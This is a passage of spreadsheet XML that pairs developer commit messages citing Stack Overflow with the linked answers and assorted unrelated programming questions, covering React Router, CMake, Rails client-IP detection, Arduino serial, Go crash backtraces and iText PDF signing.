&lt;p&gt;&lt;a href="https://i.sstatic.net/Lho2LrUd.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/Lho2LrUd.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C674</t>
  </si>
  <si>
    <t>Try to fix react router deployment issue
Based on https://stackoverflow.com/a/59153982</t>
  </si>
  <si>
    <t>You can only use
useParams
in a component that is a child of your
Router
component, but
App
is the parent in your case.
The
Router
component injects the context containing the
match
into the tree below it which will be read by the
useParams
hook by internally using the
useContext
hook.</t>
  </si>
  <si>
    <t xml:space="preserve">Wondering if there was a scenario where one would use a document-based DB and a relational DB together in a best-of-both-worlds scenario? 
</t>
  </si>
  <si>
    <t>C675</t>
  </si>
  <si>
    <t>Fix exporting wcsdup() fallback implementation without prefix from li
brary
For reliability, such fallback functions should be checked using the build system, like this:
https://stackoverflow.com/questions/647892/how-to-check-header-files-and-library-functions-in-cmake-like-it-is-done-in-auto</t>
  </si>
  <si>
    <t>You can easily port that directly with
CHECK_FUNCTION_EXISTS
,
CHECK_INCLUDE_FILE
,
CHECK_TYPE_SIZE
, etc. Also see
CMake_HowToDoPlatformChecks
for some advice.
Configuring in this style adds portability (ie you can check for
ucontext.h
and
setjmp.h
and use the one present, modifying your code with
#ifdef HAVE_UCONTEXT
or
#ifdef HAVE_SETJMP
).
Moreover, when you distribute your application, you wish to avoid having compile error (for users) and thus with a good build system, you can handle most of architecture differences before distributing your app.
It is easier for non-programmer to understand that if "check for gtk+ header - failed", they have to install gtk, rather than having a buch of compile error lines that say the same thing, but not readable for most of them :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i actually don't know how to get height and width of device screen&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  if (Build.VERSION.SDK_INT &amp;gt;= Build.VERSION_CODES.R) {
      val windowMetrics =   activity.windowManager.currentWindowMetrics
      val insets = windowMetrics.windowInsets.getInsetsIgnoringVisibility(WindowInsets.Type.systemBars())
      val width = windowMetrics.bounds.width() - insets.left - insets.right
      val height = windowMetrics.bounds.height() - insets.top - insets.bottom
      Log.e(&amp;quot;TAG&amp;quot;, &amp;quot;Screeen Width and Height: ---------&amp;gt; width  ${width} height-----&amp;gt; ${height}&amp;quot;, )
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C676</t>
  </si>
  <si>
    <t>Follow https://stackoverflow.com/questions/56063066/es6-syntax-harmon
y-mode-must-be-enabled-with-uglifier-newharmony-true to fix deploy issues with Uglifier</t>
  </si>
  <si>
    <t>Just leaving the answer here too:
In
config/environments/production.rb
replace
config.assets.js_compressor = :uglifier
with
config.assets.js_compressor = Uglifier.new(harmony: true)</t>
  </si>
  <si>
    <t xml:space="preserve">Wondering if it is possible to migrate from a document-based DB (eg. couchDB) to a RDBMS (eg. MySQL). 
</t>
  </si>
  <si>
    <t>C677</t>
  </si>
  <si>
    <t>Resolved Heroku deployment issue
After some searching on Google, I came across https://stackoverflow.com/questions/36346550/gunicorn-failed-to-load-flask-application, and used this to get my application working in Heroku.
The application at this point has not been pushed to Heroku, but has been validated using the Heroku CLI command heroku local web.</t>
  </si>
  <si>
    <t>You're pointing gunicorn at
mysite:app
, which is equivalent to
from mysite import app
.  However, there is no
app
object in the top (
__init__.py
) level import of
mysite
.  Tell gunicorn to call the factory.
gunicorn "mysite:create_app()"
You can pass arguments to the call as well.
gunicorn "mysite:create_app('production')"
Internally, this is equivalent to:
from mysite import create_app
app = create_app('production')
Alternatively, you can use a separate file that does the setup.  In your case, you already initialized an
app
in
manage.py
.
gunicorn manage:app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to record events from my Unity game, but I keep getting this error in Unity:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The type or namespace name 'Amplitude' could not be found.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've already went into Windows-&amp;gt; Package manager-&amp;gt;and then install package from &lt;a href="https://github.com/amplitude/unity-plugin.git?path=/Assets" rel="nofollow noreferrer"&gt;git&lt;/a&gt;, but I'm still getting the error. Can anyone help me resolve this issue?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using AmplitudeSDK;
        void Awake(){
            Amplitude amplitude = Amplitude.getInstance();
            amplitude.setServerUrl(&amp;quot;https://api2.amplitude.com&amp;quot;);
            amplitude.logging = true;
            amplitude.trackingSessionEvents(true);
            amplitude.init(API_KEY);
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried using what they had in the SDK tutorial, but there was never a mention of including package name or anything so I'm lost on what to do. I'm also pretty new at using Unity as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C678</t>
  </si>
  <si>
    <t>Wiring up Kernel WS communication. Doesn't actually parse the message
s yet, but the communication pipe is there. Iteratees + Enumerators = headache. Thankfully I found this (http://mandubian.com/2012/08/27/understanding-play2-iteratees-for-normal-humans/) and this (http://stackoverflow.com/questions/13305024/creating-enumerator-from-client-sent-data)</t>
  </si>
  <si>
    <t>Ok, found a way:
// The enum for pushing data to spread to all connected users
  val hubEnum = Enumerator.imperative[String]()
  // The hub used to get multiple output of a common input (the hubEnum)
  val hub = Concurrent.hub[String](hubEnum)
  // Converts message to Json for the web version
  private val asJson: Enumeratee[String, JsValue] = Enumeratee.map[String] {
    text =&gt; JsObject(
      List(
        "eventName" -&gt; JsString("eventName"),
        "text" -&gt; JsString(text)
      )
    )
  }
  // loads data into hubEnum
  def receiveData(msg: String) = Action { implicit request =&gt;
    hubEnum push msg
  } 
  // read the Hub iterator and pushes back to clients
  def stream = Action { implicit request =&gt;
     Ok.stream(hub.getPatchCord &amp;&gt; asJson &gt;&lt;&gt; EventSource()).as("text/event-stream")
  }
The trick is to create an imperative Enumerator. This enumerator allows you to push data into it when it becomes available. With this then you can follow the standard procedure: create a Hub based on the enumerator, convert it with some Enumeratee and send it back to browsers via SSE.
Thanks to
this website
for giving me the solution :)</t>
  </si>
  <si>
    <t xml:space="preserve">This is my first question, be gentle :). Im working on a project with some kind of distributed architecture.Im trying to do the following:
I have a Data Access Layer that
uses LINQ2SQL
I have a Service Layer that is a
proxy for the Data Access Layer.
I have a Business Layer that
calls the Service Layer for
Entities.
The question is how can I transfer those LINQ2SQL entities to my business Layer? 
I want to modify those objects on
the business layer and make the
travel back with the service layer
and re-transform them to LINQ2SQL
entities to persist the changes in
the DataBase.
Im sorry if Im asking for some imposible, but Im trying to figure out the beest way but I cant get something intelligent myself :)
Best Regards!
</t>
  </si>
  <si>
    <t>C679</t>
  </si>
  <si>
    <t>Fix contact form data
We also use the contact form to report various errors on the website.
To facilitate communication and better understand the problem,
we collect some basic information about user's client (browser).
Migrating to Fly introduced a bit of confusion with the IP address.
In most hostings we can get it using:
```ruby
request.remote_ip
request.remote_addr
```
or
```ruby
request.env['HTTP_X_REAL_IP']
request.env['REMOTE_ADDR']
```
However, research showed me that Fly has a custom field in the header.
For posterity, I have kept the most important links: [1] [2] [3] [4]
So the "Fly-Client-IP" field can be found in Rails under
`request.env['HTTP_FLY_CLIENT_IP']`, which doesn't seem intuitive to me.
[1]: https://fly.io/docs/reference/runtime-environment/#request-headers
[2]: https://community.fly.io/t/how-to-retreive-the-real-ip-address-of-an-http-request-with-v2-app-with-http-service-configuration/12095
[3]: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For
[4]: https://stackoverflow.com/questions/10997005/whats-the-difference-between-request-remote-ip-and-request-ip-in-rails</t>
  </si>
  <si>
    <t>request.ip is the basic ip detection provided by Rack::Request out of the box.  Its current definition can be found at https://github.com/rack/rack/blob/master/lib/rack/request.rb.
The algorithm it follows is to first check the REMOTE_ADDR header for any untrusted IP addresses, and if it finds any, it chooses the first one listed.  "Trusted" IP addresses in this case are IP addresses from the reserved private subnet ranges, but note that it matches by regex which is probably not the best way to do it.  If there is no untrusted REMOTE_ADDR then it looks at the HTTP_X_FORWARDED_FOR header, and picks the last untrusted one listed.  If neither of those reveals anyone it falls back to the raw REMOTE_ADDR which is probably 127.0.0.1.
request.remote_ip
request.remote_ip is enhanced IP detection provided by ActionDispatch::Request (which inherits from Rack::Request).  This is the code shown in the question.  As you can see, it falls back to request.ip unless action_dispatch.remote_ip is set on the @env.  That is done by the RemoteIp middleware, which is included in the default Rails stack.  You can see its source at https://github.com/rails/rails/blob/4-2-stable/actionpack/lib/action_dispatch/middleware/remote_ip.rb.
The RemoteIp middleware if enabled provides these additional features:
Provides optional but default IP spoofing detection.
Allows configuration proxy addresses to be filtered instead of relying only on defaults.
Uses the IPAddr class to actually test IP ranges properly instead of relying on a brittle regex.
Uses HTTP_CLIENT_IP as a source of potential IPs.
The algorithm is similar to request.ip but slightly different.  It uses HTTP_X_FORWARDED_FOR from last to first, then HTTP_CLIENT_IP from last to first, then finally the last entry of REMOTE_ADDR.  It puts those all in a list and filters proxies, picking the first remaining one.
IP Spoofing Detection
The IP spoofing detection provided by RemoteIp is not particularly powerful, all it does is raise an exception if the last HTTP_CLIENT_IP is not in HTTP_X_FORWARDED_FOR.  This isn't necessarily a symptom of an attack, but it is probably a symptom of a misconfiguration or a mix of proxies using different conventions which are not producing a coherent result.
Which to Use
In a simple setup where your proxies are all local or on private subnets, you can probably get away with request.ip, but request.remote_ip should be considered the superior choice in general.  If you are using proxies with public internet routing (such as many CDNs) then RemoteIp can be configured to give you correct client IPs out of the box, whereas request.ip will only be correct if you can get your upstream proxy to set REMOTE_ADDR correctly.
Secure Configuration
Now to address Tim Coulter's comment about spoofing.  He's definitely right you should be concerned, but he's wrong that you can be spoofed if you're behind nginx or haproxy by default.  RemoteIp is designed to prevent spoofing by choosing the last IP in the chain.  The X-Forwarded-For spec specifies that each proxy append the requester's IP to the end of the chain.  By filtering out whitelisted proxies, the last entry is guaranteed to be the client IP written by your first whitelisted proxy.  There is one caveat of course, which is that you must actually be running a proxy that always sets/appends X-Forwarded-For, so Tim's advice should actually be opposite: only use request.remote_ip when you are running a proxy.
How To Configure for Public IP Proxies
That's all fine and good, but ActionDispatch::RemoteIp is already in the default middleware stack.  How do reconfigure it to add my proxy CIDRs?!
Add this to your application.rb:
check_spoofing = true
proxies = ["23.235.32.0/20", "203.57.145.0/24"]
proxies += ActionDispatch::RemoteIp::TRUSTED_PROXIES
config.middleware.swap ActionDispatch::RemoteIp,
                       ActionDispatch::RemoteIp,
                       true,
                       proxies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, given a range in the document, how can I make it return its width? It can be either in points or cm, IDRC.&lt;/p&gt;
&lt;p&gt;I didn't find a single function, not even close. The Repository says .FitTextWidth can return it but that seems to be complete bullocks; every time I tried, it only returned the value of zero.&lt;/p&gt;
&lt;p&gt;The code I used to define the range is this one&lt;/p&gt;
&lt;p&gt;I use this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim end_range As Range
Dim start_range As Range
Dim whole_range As Range
Set end_range = Selection.Range
Selection.GoTo What:=wdGoToLine, Which:=wdGoToRelative, Count:=0
Set start_range = Selection.Range
Set whole_range = ActiveDocument.Range(Start:= _
start_range.Start, End:=end_range.End)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it defines the range from the first character of the line up untill the current insertion point. The width is not useful for any practial application, I just wanna do it for the sake of doing it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C68</t>
  </si>
  <si>
    <t>Set up current code to begin handling component objects.
Major Changes:
- Added DLLAComponent abstract component class.  Note: http://stackoverflow.com/questions/1034373/creating-an-abstract-class-in-objective-c</t>
  </si>
  <si>
    <t>Typically, Objective-C class are abstract by convention only—if the author documents a class as abstract, just don't use it without subclassing it. There is no compile-time enforcement that prevents instantiation of an abstract class, however. In fact, there is nothing to stop a user from providing implementations of abstract methods via a category (i.e. at runtime). You can force a user to at least override certain methods by raising an exception in those methods implementation in your abstract class:
[NSException raise:NSInternalInconsistencyException 
            format:@"You must override %@ in a subclass", NSStringFromSelector(_cmd)];
If your method returns a value, it's a bit easier to use
@throw [NSException exceptionWithName:NSInternalInconsistencyException
                               reason:[NSString stringWithFormat:@"You must override %@ in a subclass", NSStringFromSelector(_cmd)]
                             userInfo:nil];
as then you don't need to add a return statement from the method.
If the abstract class is really an interface (i.e. has no concrete method implementations), using an Objective-C protocol is the more appropriate option.</t>
  </si>
  <si>
    <t xml:space="preserve">If you're familiar with the phrase "build one to throw away", well, we seem to have done that; weâ€™re reaching the limits of version 1 of our online app. It's time to clean things up by:
Re-organizing code and UI
Unifying UI processes
Adding more functionality
Building for the future
Modifying our database structure to handle all of the above
What's the best way to make this transition happen?
We want to avoid throwing all of our users over to a new system (once it's finished) ... they'd freak out and we couldn't handle the call load. Our users run the gamut, from technically proficient used-to-write-software types, to those that don't know what HTML is.
Should we start a new "installation" of our system and move users over to it gradually after we ensure this new design sufficiently solves enough of the problems with version 1?
Should we (somehow) change each module of our system incrementally, and phase? This may be difficult because the database layout will change, resulting in having to tweak the "core code" and the code for several surrounding modules.
Is it common to have a set of trusted, patient, "beta tester" clients using a cutting edge version of an app? (The goal here would be to get feedback and test for bugs on a new system)
Any other advice? First-hand experience?
</t>
  </si>
  <si>
    <t>C680</t>
  </si>
  <si>
    <t>Fix Arduino serial communications on Windows
Set DtrEnable and RtsEnable to true, fixing serial communication with
Arduino Uno on Windows.  Oddly enough, this doesn't seem to matter on
Linux.
Part 2 of whatever in the great Windows bring-up.
See https://stackoverflow.com/questions/26929153/c-sharp-serial-communcation-with-arduino#26929382</t>
  </si>
  <si>
    <t>I Switched the code to a windows form application, it still was not working. Then i found a topic about serial communication with C# about arduino leonardo
here
I had to do this:
serial.DtrEnable = true;
        serial.RtsEnable = true;
I consider my problem as solved.</t>
  </si>
  <si>
    <t xml:space="preserve">What are the best resources to properly establish oneself in best Software Architecture practices. 
</t>
  </si>
  <si>
    <t>C681</t>
  </si>
  <si>
    <t>MQTT: Fixed MQTT header constructing and parsing
Bit fields must not be used in communication protocol frame parsing.
See http://stackoverflow.com/questions/1490092/c-c-force-bit-field-order-and-alignment.
The bit-fields used in AWS C library caused issues in PowerPC target I'm using.
This might not be the most beautiful way to fix it, but it works. Tested on x86
and PowerPC architectures.</t>
  </si>
  <si>
    <t>No, it will not be fully-portable.  Packing options for structs are extensions, and are themselves not fully portable.  In addition to that, C99 §6.7.2.1, paragraph 10 says: "The order of allocation of bit-fields within a unit (high-order to low-order or low-order to high-order) is implementation-defined."
Even a single compiler might lay the bit field out differently depending on the endianness of the target platform, for example.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using &lt;a href="https://github.com/gen2brain/aac-go.git" rel="nofollow noreferrer"&gt;https://github.com/gen2brain/aac-go.git&lt;/a&gt; to encode AAC in my golang project, but sometimes I got crash in my ARMV7l linux and I have executed like &lt;code&gt;CGO_DEBUG=1 GOTRACEBACK=crash ./binary&lt;/code&gt; to got the coredump file, I use gdb-multiarch to view stacktrace but only see stack of golang runtime, it seems c will emit a signal and cgo will handle this signal, so how can I view the exact c calltack of crash, any help will be appreciate.&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;#0  runtime.futex () at /usr/local/go/src/runtime/sys_linux_arm.s:416
#1  0x000597b4 in runtime.futexsleep (addr=0x2859c50, val=0, ns=-1) at /usr/local/go/src/runtime/os_linux.go:69
#2  0x0002246c in runtime.notesleep (n=0x2859c50) at /usr/local/go/src/runtime/lock_futex.go:170
#3  0x0006432c in runtime.mPark () at /usr/local/go/src/runtime/proc.go:1761
#4  0x00065d78 in runtime.stopm () at /usr/local/go/src/runtime/proc.go:2782
#5  0x000668b0 in runtime.gcstopm () at /usr/local/go/src/runtime/proc.go:3081
#6  0x00066b10 in runtime.findRunnable (gp=&amp;lt;optimized out&amp;gt;, inheritTime=&amp;lt;optimized out&amp;gt;, tryWakeP=&amp;lt;optimized out&amp;gt;) at /usr/local/go/src/runtime/proc.go:3149
#7  0x00068d7c in runtime.schedule () at /usr/local/go/src/runtime/proc.go:3868
#8  0x000696ec in runtime.goschedImpl (gp=0x3730d88, preempted=true) at /usr/local/go/src/runtime/proc.go:4065
#9  0x000697e8 in runtime.gopreempt_m (gp=0x3730d88) at /usr/local/go/src/runtime/proc.go:4082
#10 0x0007df50 in runtime.newstack () at /usr/local/go/src/runtime/stack.go:1070
#11 0x0009cf10 in runtime.morestack () at /usr/local/go/src/runtime/asm_arm.s:383
#12 0x00000000 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
Thread 10 (LWP 3666):
#0  runtime.futex () at /usr/local/go/src/runtime/sys_linux_arm.s:416
#1  0x000597b4 in runtime.futexsleep (addr=0x28800d0, val=0, ns=-1) at /usr/local/go/src/runtime/os_linux.go:69
#2  0x0002246c in runtime.notesleep (n=0x28800d0) at /usr/local/go/src/runtime/lock_futex.go:170
#3  0x0006432c in runtime.mPark () at /usr/local/go/src/runtime/proc.go:1761
#4  0x00065d78 in runtime.stopm () at /usr/local/go/src/runtime/proc.go:2782
#5  0x0006b03c in runtime.exitsyscall0 (gp=0x2814008) at /usr/local/go/src/runtime/proc.go:4755
#6  0x0009ce04 in runtime.mcall () at /usr/local/go/src/runtime/asm_arm.s:265
#7  0x00000000 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
Thread 9 (LWP 335):
#0  runtime.futex () at /usr/local/go/src/runtime/sys_linux_arm.s:416
#1  0x000597b4 in runtime.futexsleep (addr=0x2880bd0, val=0, ns=-1) at /usr/local/go/src/runtime/os_linux.go:69
#2  0x0002246c in runtime.notesleep (n=0x2880bd0) at /usr/local/go/src/runtime/lock_futex.go:170
#3  0x0006432c in runtime.mPark () at /usr/local/go/src/runtime/proc.go:1761
#4  0x00065d78 in runtime.stopm () at /usr/local/go/src/runtime/proc.go:2782
#5  0x00066adc in runtime.findRunnable (gp=&amp;lt;optimized out&amp;gt;, inheritTime=&amp;lt;optimized out&amp;gt;, tryWakeP=&amp;lt;optimized out&amp;gt;) at /usr/local/go/src/runtime/proc.go:3512
#6  0x00068d7c in runtime.schedule () at /usr/local/go/src/runtime/proc.go:3868
#7  0x000695cc in runtime.park_m (gp=0x2a93b08) at /usr/local/go/src/runtime/proc.go:4036
#8  0x0009ce04 in runtime.mcall () at /usr/local/go/src/runtime/asm_arm.s:265
#9  0x0239f150 in go:buildinfo ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
Thread 8 (LWP 3667):
#0  runtime.futex () at /usr/local/go/src/runtime/sys_linux_arm.s:416
#1  0x000597b4 in runtime.futexsleep (addr=0x242b6cc &amp;lt;runtime[newmHandoff]+12&amp;gt;, val=0, ns=-1) at /usr/local/go/src/runtime/os_linux.go:69
#2  0x0002246c in runtime.notesleep (n=0x242b6cc &amp;lt;runtime[newmHandoff]+12&amp;gt;) at /usr/local/go/src/runtime/lock_futex.go:170
#3  0x00065c50 in runtime.templateThread () at /usr/local/go/src/runtime/proc.go:2760
#4  0x00064234 in runtime.mstart1 () at /usr/local/go/src/runtime/proc.go:1729
#5  0x0006419c in runtime.mstart0 () at /usr/local/go/src/runtime/proc.go:1686
#6  0x0009cda4 in runtime.mstart () at /usr/local/go/src/runtime/asm_arm.s:210
Thread 7 (LWP 3665):
#0  runtime.futex () at /usr/local/go/src/runtime/sys_linux_arm.s:416
#1  0x000597b4 in runtime.futexsleep (addr=0x2859150, val=0, ns=-1) at /usr/local/go/src/runtime/os_linux.go:69
#2  0x0002246c in runtime.notesleep (n=0x2859150) at /usr/local/go/src/runtime/lock_futex.go:170
#3  0x0006432c in runtime.mPark () at /usr/local/go/src/runtime/proc.go:1761
--Type &amp;lt;RET&amp;gt; for more, q to quit, c to continue without paging--
#4  0x00065d78 in runtime.stopm () at /usr/local/go/src/runtime/proc.go:2782
#5  0x0006b03c in runtime.exitsyscall0 (gp=0x2be9688) at /usr/local/go/src/runtime/proc.go:4755
#6  0x0009ce04 in runtime.mcall () at /usr/local/go/src/runtime/asm_arm.s:265
#7  0x02405458 in runtime[semtable] ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
Thread 6 (LWP 3676):
#0  runtime.futex () at /usr/local/go/src/runtime/sys_linux_arm.s:416
#1  0x000597b4 in runtime.futexsleep (addr=0x285a1d0, val=0, ns=-1) at /usr/local/go/src/runtime/os_linux.go:69
#2  0x0002246c in runtime.notesleep (n=0x285a1d0) at /usr/local/go/src/runtime/lock_futex.go:170
#3  0x0006432c in runtime.mPark () at /usr/local/go/src/runtime/proc.go:1761
#4  0x00065d78 in runtime.stopm () at /usr/local/go/src/runtime/proc.go:2782
#5  0x00066adc in runtime.findRunnable (gp=&amp;lt;optimized out&amp;gt;, inheritTime=&amp;lt;optimized out&amp;gt;, tryWakeP=&amp;lt;optimized out&amp;gt;) at /usr/local/go/src/runtime/proc.go:3512
#6  0x00068d7c in runtime.schedule () at /usr/local/go/src/runtime/proc.go:3868
#7  0x000695cc in runtime.park_m (gp=0x2d11e68) at /usr/local/go/src/runtime/proc.go:4036
#8  0x0009ce04 in runtime.mcall () at /usr/local/go/src/runtime/asm_arm.s:265
#9  0x02d11e68 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
Thread 5 (LWP 3793):
#0  runtime.futex () at /usr/local/go/src/runtime/sys_linux_arm.s:416
#1  0x000597b4 in runtime.futexsleep (addr=0x285a750, val=0, ns=-1) at /usr/local/go/src/runtime/os_linux.go:69
#2  0x0002246c in runtime.notesleep (n=0x285a750) at /usr/local/go/src/runtime/lock_futex.go:170
#3  0x0006432c in runtime.mPark () at /usr/local/go/src/runtime/proc.go:1761
#4  0x00065d78 in runtime.stopm () at /usr/local/go/src/runtime/proc.go:2782
#5  0x00066adc in runtime.findRunnable (gp=&amp;lt;optimized out&amp;gt;, inheritTime=&amp;lt;optimized out&amp;gt;, tryWakeP=&amp;lt;optimized out&amp;gt;) at /usr/local/go/src/runtime/proc.go:3512
#6  0x00068d7c in runtime.schedule () at /usr/local/go/src/runtime/proc.go:3868
#7  0x000695cc in runtime.park_m (gp=0x28058c8) at /usr/local/go/src/runtime/proc.go:4036
#8  0x0009ce04 in runtime.mcall () at /usr/local/go/src/runtime/asm_arm.s:265
#9  0x0239f150 in go:buildinfo ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
Thread 4 (LWP 3662):
#0  runtime.futex () at /usr/local/go/src/runtime/sys_linux_arm.s:416
#1  0x000597b4 in runtime.futexsleep (addr=0x23fef70 &amp;lt;runtime.m0+200&amp;gt;, val=0, ns=-1) at /usr/local/go/src/runtime/os_linux.go:69
#2  0x0002246c in runtime.notesleep (n=0x23fef70 &amp;lt;runtime.m0+200&amp;gt;) at /usr/local/go/src/runtime/lock_futex.go:170
#3  0x0006432c in runtime.mPark () at /usr/local/go/src/runtime/proc.go:1761
#4  0x00066610 in runtime.stoplockedm () at /usr/local/go/src/runtime/proc.go:3026
#5  0x00068ce8 in runtime.schedule () at /usr/local/go/src/runtime/proc.go:3847
#6  0x000695cc in runtime.park_m (gp=0x2885328) at /usr/local/go/src/runtime/proc.go:4036
#7  0x0009ce04 in runtime.mcall () at /usr/local/go/src/runtime/asm_arm.s:265
#8  0x00000004 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
Thread 3 (LWP 3663):
#0  runtime.usleep () at /usr/local/go/src/runtime/sys_linux_arm.s:576
#1  0x0006e454 in runtime.sysmon () at /usr/local/go/src/runtime/proc.go:5965
#2  0x00064234 in runtime.mstart1 () at /usr/local/go/src/runtime/proc.go:1729
#3  0x0006419c in runtime.mstart0 () at /usr/local/go/src/runtime/proc.go:1686
#4  0x0009cda4 in runtime.mstart () at /usr/local/go/src/runtime/asm_arm.s:210
Thread 2 (LWP 3664):
#0  runtime.futex () at /usr/local/go/src/runtime/sys_linux_arm.s:416
#1  0x000597b4 in runtime.futexsleep (addr=0x2858bd0, val=0, ns=-1) at /usr/local/go/src/runtime/os_linux.go:69
#2  0x0002246c in runtime.notesleep (n=0x2858bd0) at /usr/local/go/src/runtime/lock_futex.go:170
--Type &amp;lt;RET&amp;gt; for more, q to quit, c to continue without paging--
#3  0x0006432c in runtime.mPark () at /usr/local/go/src/runtime/proc.go:1761
#4  0x00065d78 in runtime.stopm () at /usr/local/go/src/runtime/proc.go:2782
#5  0x000668b0 in runtime.gcstopm () at /usr/local/go/src/runtime/proc.go:3081
#6  0x00066b10 in runtime.findRunnable (gp=&amp;lt;optimized out&amp;gt;, inheritTime=&amp;lt;optimized out&amp;gt;, tryWakeP=&amp;lt;optimized out&amp;gt;) at /usr/local/go/src/runtime/proc.go:3149
#7  0x00068d7c in runtime.schedule () at /usr/local/go/src/runtime/proc.go:3868
#8  0x000695cc in runtime.park_m (gp=0x2a92fc8) at /usr/local/go/src/runtime/proc.go:4036
#9  0x0009ce04 in runtime.mcall () at /usr/local/go/src/runtime/asm_arm.s:265
#10 0x0239f150 in go:buildinfo ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
Thread 1 (LWP 3668):
#0  runtime.raise () at /usr/local/go/src/runtime/sys_linux_arm.s:153
#1  0x0007aa38 in runtime.dieFromSignal (sig=6) at /usr/local/go/src/runtime/signal_unix.go:923
#2  0x0007b1dc in runtime.sigfwdgo (sig=6, info=0x2987848, ctx=0x29878c8, ~r0=&amp;lt;optimized out&amp;gt;) at /usr/local/go/src/runtime/signal_unix.go:1128
#3  0x0007983c in runtime.sigtrampgo (sig=6, info=0x2987848, ctx=0x29878c8) at /usr/local/go/src/runtime/signal_unix.go:432
#4  0x0009fc48 in runtime.sigtramp () at /usr/local/go/src/runtime/sys_linux_arm.s:535
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C682</t>
  </si>
  <si>
    <t>New AnalyzeSignatures test focusing on the stack overflow question
MakeSignature.SignDeferred &amp; Embedding Signature Problem (Itextsharp)
https://stackoverflow.com/questions/56560783/makesignature-signdeferred-embedding-signature-problem-itextsharp
test_signed.pdf, the signature being extracted as "test_signed.pdf.SIG.raw"
http://kurumsalhizmet.hobim.com/misc
testDenizKasarSignatureTestSigned - The signature bytes are neither PKCS1-v1_5 padded nor EMSA-PSS encoded. Something already gone wrong in communication with the signature card. Probably the wrong signing app there-on was addressed.</t>
  </si>
  <si>
    <t>Your original code and example signature
To start with, decrypting the signature bytes with your certificate's public key results in something that clearly is neither PKCS1-v1_5 padded nor EMSA-PSS encoded. Thus, your smart card either does not sign using the private key associated with that certificate
C=TR,SERIALNUMBER=90000000684,CN=DENİZ KASAR
or the result it returns is not the plain signature bytes array for a RSASSA-PKCS1-v1_5 or RSASSA-PSS signature for your input of a hash value.
Probably there are multiple private keys for different certificates on your card and you addressed the wrong one. Probably there is a different issue.
Furthermore, you call
getAuthenticatedAttributeBytes
with these parameters
byte[] signatureHash = signature.getAuthenticatedAttributeBytes(hash, null, null, CryptoStandard.CMS);
then store
hash
in a local variable
_hash
, but finally call
GetEncodedPKCS7
with these parameters
byte[] encodedSignature = _signature.GetEncodedPKCS7(_signatureHash, null, null, null, CryptoStandard.CMS);
This looks incorrect, the parameters of these calls (except the TSA client) are expected to coincide, you should use
_hash
here, too.
Your later example signature
In a comment you confirmed that your smart card has two certificates. Apparently in you newer code you also successfully addressed the signing application for the certificate you want to sign with as the signature bytes after RSA decryption end with
0xbc
which is an indicator for RSASSA-PSS signatures.
This also has a downside, though: The iText 5.x signing API was not implemented with RSASSA-PSS in mind and in particular the
PdfPKCS7
class cannot properly build CMS containers from RSASSA-PSS signatures.
That doesn't mean, though, that you cannot use iText for signing with your card, you merely have to implement more in your own code, in particular you have to build the whole signature container.
For this you use this
MakeSignature
helper
/**
 * Sign the document using an external container, usually a PKCS7. The signature is fully composed
 * externally, iText will just put the container inside the document.
 * @param sap the PdfSignatureAppearance
 * @param externalSignatureContainer the interface providing the actual signing
 * @param estimatedSize the reserved size for the signature
 * @throws GeneralSecurityException
 * @throws IOException
 * @throws DocumentException 
 */
public static void SignExternalContainer(PdfSignatureAppearance sap, IExternalSignatureContainer externalSignatureContainer, int estimatedSize)
and merely have to implement
IExternalSignatureContainer
to build and return a CMS signature container in its
Sign
method which signs the data from the given stream.
You can build that CMS container using BouncyCastle classes or probably even Microsoft classes. Unfortunately, though, I'm mostly into this hands-on signing stuff in Java, not in .Net, so I cannot really help with that.
In case of RSASSA-PKCS1-v1_5 signatures
An alternative approach would be to check whether you can tell your smart card to generate RSASSA-PKCS1-v1_5 signatures instead as this would allow you to use iText to generate your CMS container. I wouldn't recommend this as RSASSA-PKCS1-v1_5 is more open to attacks than RSASSA-PSS.
In a comment, though, you specifically asked about that case. In that case I'd propose you change your signing code considerably. It currently uses a mix of the old, more low-level, and the new, more high-level, iText signing APIs. You should use the new API only.
In that case your signing code would reduce to this pivotal code
using (PdfReader reader = new PdfReader(SRC))
using (FileStream os = new FileStream(DEST, FileMode.Create))
{
    PdfStamper stamper = PdfStamper.CreateSignature(reader, os, '\0');
    // Creating the appearance
    PdfSignatureAppearance appearance = stamper.SignatureAppearance;
    appearance.Reason = "MyRes";
    appearance.Location = "MyLoc";
    appearance.SetVisibleSignature(new Rectangle(36, 748, 250, 400), 1, "SIG");
    // Creating the signature
    CustomExternalSignature pks = new CustomExternalSignature();
    MakeSignature.SignDetached(appearance, pks, pks.GetChain(), null, null, null, 0, CryptoStandard.CMS);
}
in combination with the
CustomExternalSignature
helper class bundling your device specific code:
public class CustomExternalSignature : IExternalSignature
{
    public ICollection&lt;X509Certificate&gt; GetChain()
    {
        [essentially your GetChain method, but return the List as is, don't make it an array]]
    }
    public string GetEncryptionAlgorithm()
    {
        return "RSA";
    }
    public string GetHashAlgorithm()
    {
        return "SHA256";
    }
